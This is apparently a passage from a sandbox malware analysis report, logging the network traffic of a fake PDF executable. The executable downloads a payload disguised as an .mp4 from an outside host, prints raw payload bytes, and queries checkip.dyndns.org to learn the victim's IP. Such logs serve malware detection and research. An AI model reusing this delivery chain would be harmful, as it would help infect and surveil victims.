                                                              Pragma: no-cache
                                                              X-Request-ID: 36d55b2059c9abc54fb4ee7b6b2afeba
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 66.23.206.109</body></html>
                                                              Nov 11, 2024 05:16:56.085685968 CET127OUTGET / HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              Nov 11, 2024 05:16:56.295783043 CET322INHTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:16:56 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 105
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              X-Request-ID: e0d8a0604c6c2711fa81fad3fb1c1d6a
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 66.23.206.109</body></html>
                                                              Nov 11, 2024 05:16:57.673269987 CET127OUTGET / HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              Nov 11, 2024 05:16:57.882739067 CET322INHTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:16:57 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 105
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              X-Request-ID: 8c735f319079ab674bd690b96401c053
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 66.23.206.109</body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.549708132.226.247.73801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 11, 2024 05:16:58.441224098 CET127OUTGET / HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              Nov 11, 2024 05:16:59.099508047 CET322INHTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:16:58 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 105
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              X-Request-ID: 67f0415f023cd049f9802d77db4c4c25
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 66.23.206.109</body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              2192.168.2.549710132.226.247.73801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 11, 2024 05:17:00.660936117 CET127OUTGET / HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              Nov 11, 2024 05:17:01.318558931 CET322INHTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:17:01 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 105
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              X-Request-ID: ced0ac6ade74e22668d90c430dcce6a2
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 66.23.206.109</body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              3192.168.2.549712132.226.247.73801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 11, 2024 05:17:01.858141899 CET151OUTGET / HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              Connection: Keep-Alive
                                                              Nov 11, 2024 05:17:02.517927885 CET322INHTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:17:02 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 105
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              X-Request-ID: 7019da6f632dba2780f1264fe8b3cad5
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 66.23.206.109</body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              4192.168.2.549714132.226.247.73801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 11, 2024 05:17:03.087774038 CET151OUTGET / HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              Connection: Keep-Alive
                                                              Nov 11, 2024 05:17:03.748186111 CET322INHTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:17:03 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 105
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              X-Request-ID: b213283711a68380478abf377c57332f
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 66.23.206.109</body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              5192.168.2.549716132.226.247.73801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 11, 2024 05:17:04.297765017 CET151OUTGET / HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              Connection: Keep-Alive
                                                              Nov 11, 2024 05:17:04.956367970 CET322INHTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:17:04 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 105
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              X-Request-ID: 7694587ab6c22093b5c10161d3e6bc6e
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 66.23.206.109</body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              6192.168.2.549718132.226.247.73801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 11, 2024 05:17:05.570384979 CET151OUTGET / HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              Connection: Keep-Alive
                                                              Nov 11, 2024 05:17:06.228136063 CET322INHTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:17:06 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 105
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              X-Request-ID: 7ee49f1fe88f897a412ac71d458bfa14
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 66.23.206.109</body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              7192.168.2.549722132.226.247.73801476C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 11, 2024 05:17:09.225678921 CET151OUTGET / HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              Connection: Keep-Alive
                                                              Nov 11, 2024 05:17:09.892749071 CET322INHTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:17:09 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 105
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              X-Request-ID: 7d562d3df24c6b3f38e422bfab6b4e83
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 66.23.206.109</body></html>
                                                              Nov 11, 2024 05:17:09.896322966 CET127OUTGET / HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              Nov 11, 2024 05:17:10.105959892 CET322INHTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:17:09 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 105
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              X-Request-ID: 0544c3005ef23f8af093995904efec25
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 66.23.206.109</body></html>
                                                              Nov 11, 2024 05:17:11.157618046 CET127OUTGET / HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              Nov 11, 2024 05:17:11.367885113 CET322INHTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:17:11 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 105
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              X-Request-ID: 5f5a07b550ce3e9f7393e0585fba2d38
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 66.23.206.109</body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              8192.168.2.549731132.226.247.73801476C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 11, 2024 05:17:11.957041025 CET127OUTGET / HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              Nov 11, 2024 05:17:12.614900112 CET322INHTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:17:12 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 105
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              X-Request-ID: 44ec6786e25416d82661593feebbd697
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 66.23.206.109</body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              9192.168.2.549740132.226.247.73801476C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 11, 2024 05:17:13.514837027 CET151OUTGET / HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              Connection: Keep-Alive
                                                              Nov 11, 2024 05:17:14.172065020 CET322INHTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:17:14 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 105
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              X-Request-ID: fd11d340e318c7ae9d33c17de2640c4d
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 66.23.206.109</body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              10192.168.2.549752132.226.247.73801476C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 11, 2024 05:17:14.719708920 CET151OUTGET / HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              Connection: Keep-Alive
                                                              Nov 11, 2024 05:17:15.378827095 CET322INHTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:17:15 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 105
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              X-Request-ID: 7aa49dd46f1164773685030061d83622
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 66.23.206.109</body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              11192.168.2.549764132.226.247.73801476C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 11, 2024 05:17:15.958626032 CET151OUTGET / HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              Connection: Keep-Alive
                                                              Nov 11, 2024 05:17:16.616981983 CET322INHTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:17:16 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 105
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              X-Request-ID: 85278c1e26254b16fb407b114464cb00
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 66.23.206.109</body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              12192.168.2.549776132.226.247.73801476C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 11, 2024 05:17:17.161007881 CET151OUTGET / HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              Connection: Keep-Alive
                                                              Nov 11, 2024 05:17:17.818900108 CET322INHTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:17:17 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 105
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              X-Request-ID: 460f4b70821cad0a4fd957f3bcc732c5
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 66.23.206.109</body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              13192.168.2.549788132.226.247.73801476C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 11, 2024 05:17:18.364017963 CET151OUTGET / HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              Connection: Keep-Alive
                                                              Nov 11, 2024 05:17:19.022644043 CET322INHTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:17:18 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 105
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              X-Request-ID: 39132491ee4a31a156853471a779de7f
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 66.23.206.109</body></html>


                                                              HTTPS Proxied Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.549704185.78.221.734437088C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-11-11 04:16:53 UTC85OUTGET /slim/Tvifaznhqk.mp4 HTTP/1.1
                                                              Host: www.oleonidas.gr
                                                              Connection: Keep-Alive
                                                              2024-11-11 04:16:53 UTC298INHTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:16:53 GMT
                                                              Server: Apache
                                                              Last-Modified: Mon, 11 Nov 2024 00:29:38 GMT
                                                              Accept-Ranges: bytes
                                                              Content-Length: 954376
                                                              Cache-Control: max-age=1209600
                                                              Expires: Mon, 25 Nov 2024 04:16:53 GMT
                                                              Vary: User-Agent
                                                              Connection: close
                                                              Content-Type: video/mp4
                                                              2024-11-11 04:16:53 UTC7894INData Raw: f1 3a bb 06 00 9e 8c 5b ac 04 ce a0 44 d3 66 6e 5d b4 6e 4c a8 11 1b 07 66 a0 7c e6 ff 7b ca c1 4f 5e 4e e9 bb fd 08 06 4a 78 e0 64 16 39 a1 fa 1c b2 cc 89 e3 3c 4f ee ae 5c bd 66 cc 8d 10 00 bf 2d 55 93 fa 58 9c f3 f0 5e 33 e4 b5 dd 93 57 a3 22 8f 78 5b c0 b9 09 49 7c df 59 ca f7 ad ff f5 05 a0 0d 04 87 80 e3 48 6d 8d 20 ac 13 76 94 3b fc a7 4b 4d d2 08 f7 a4 3a 08 8e aa dd 33 3b 2d 3e af 44 84 d2 88 08 49 bf f7 fe c7 85 61 bc c0 95 cf 74 22 6c 56 83 8d e4 51 71 be 88 5e 8a 84 41 fc d8 76 b0 2d 3f 03 9c ae ec 35 93 cc 79 18 89 f7 e6 6c 86 ec bd 25 bf d8 5d a4 18 ac ff db c2 14 24 79 12 85 e9 cc e0 7e 68 40 a8 26 e8 22 4a 13 fc 4e 70 1d 88 d6 c2 ef 05 7d c4 6e 55 24 68 2c 60 a7 c3 cd 48 6a 3b e0 f9 99 93 8e a2 3d e5 63 8d 0b f6 56 ff 72 5b b4 94 8e ea f6
                                                              Data Ascii: :[Dfn]nLf|{O^NJxd9<O\f-UX^3W"x[I|YHm v;KM:3;->DIat"lVQq^Av-?5yl%]$y~h@&"JNp}nU$h,`Hj;=cVr[
                                                              2024-11-11 04:16:53 UTC8000INData Raw: 63 cb 9b f4 8b da 6e 22 5f 8f 73 8c ad dc 1e b1 bb 2a a0 63 0c 93 24 e7 2f 43 ab 96 d2 06 ac b5 14 15 da cc e8 87 4a 3d 10 40 78 b8 21 71 e2 5d 9b 6a 41 de a3 96 02 86 be cc c5 d8 86 a7 71 b5 ac 34 e9 a3 c3 42 48 a9 b8 ab a5 08 39 e0 44 af 8a 1d 12 cb 4f 7b 92 e3 4d 78 52 88 e4 26 51 cd fc 84 87 56 8a 2b 36 4d 73 3e 20 74 28 a2 0a e3 bd 54 9b 00 c7 bd a2 2e 46 4b 5b 68 31 0e ec e6 83 7d bd da 2e 91 a6 a6 f9 9f 53 7b 7a a7 35 49 c7 0a 30 1d ce f4 0b 77 a6 cf af 76 a3 7c 1a 0e 26 3f ca 28 ca 7a 5f 47 83 38 ab 50 bc 3d bb 37 d8 8d c1 5e 02 22 dd 52 a0 da 53 bb 76 e6 96 a7 93 94 12 5a 5c da 2c 6a 6a 79 68 71 2d 1e cd c3 89 9e 13 a1 75 90 ea 10 6b b5 20 f4 d3 10 6e a6 90 08 6d 4a 66 78 26 da 41 e1 bc d1 31 ea 3b 9c f3 13 e0 5b 4b 97 4e 7d 36 78 09 57 c7 e0 e0
                                                              Data Ascii: cn"_s*c$/CJ=@x!q]jAq4BH9DO{MxR&QV+6Ms> t(T.FK[h1}.S{z5I0wv|&?(z_G8P=7^"RSvZ\,jjyhq-uk nmJfx&A1;[KN}6xW
                                                              2024-11-11 04:16:53 UTC8000INData Raw: e2 6f 46 fd c5 58 4f e9 f6 e9 e1 d1 d8 3c 9a 8e 12 ba 97 b0 a4 e6 8e ac 11 a5 a0 26 d8 54 37 22 bc e9 20 b9 70 4d b0 f3 db a3 2c a9 33 e2 02 80 52 91 c4 3b 77 f1 f7 44 a2 dd 6a 21 47 c7 94 e5 69 36 9f a4 6a 72 08 fd c8 21 5f 91 52 84 8e 70 df e9 8b 12 3b bb dc 36 d0 b9 25 80 56 c1 f5 1d 03 e1 65 13 ae dd 5a 9f 5c 02 cb 7d 35 96 27 90 0f bc 12 bf 52 92 be 11 da 52 b3 2b 79 87 55 d4 7e 85 db 7c 4e f0 ac cc 27 d5 63 c6 b9 a0 f2 7d 1b d3 1c e6 c7 74 b9 79 03 be bd 9f 01 8a fb 22 0c 52 a4 eb a8 e5 53 6c 9d 62 6d 48 69 0d 68 0a 91 0a 46 83 cb aa 30 9b 81 f6 23 10 18 a6 d4 59 b6 5e 08 f6 48 70 ca cd 15 01 5e 97 08 b1 e2 60 f1 1c 73 36 50 7f e9 77 ee 94 46 0b 6f 5b b8 d2 8e 23 6a d5 15 a2 68 a1 63 05 e1 e7 db 2b fc 58 01 c6 4b 64 4b 35 c9 fa 8a 03 b2 56 aa c0 ef
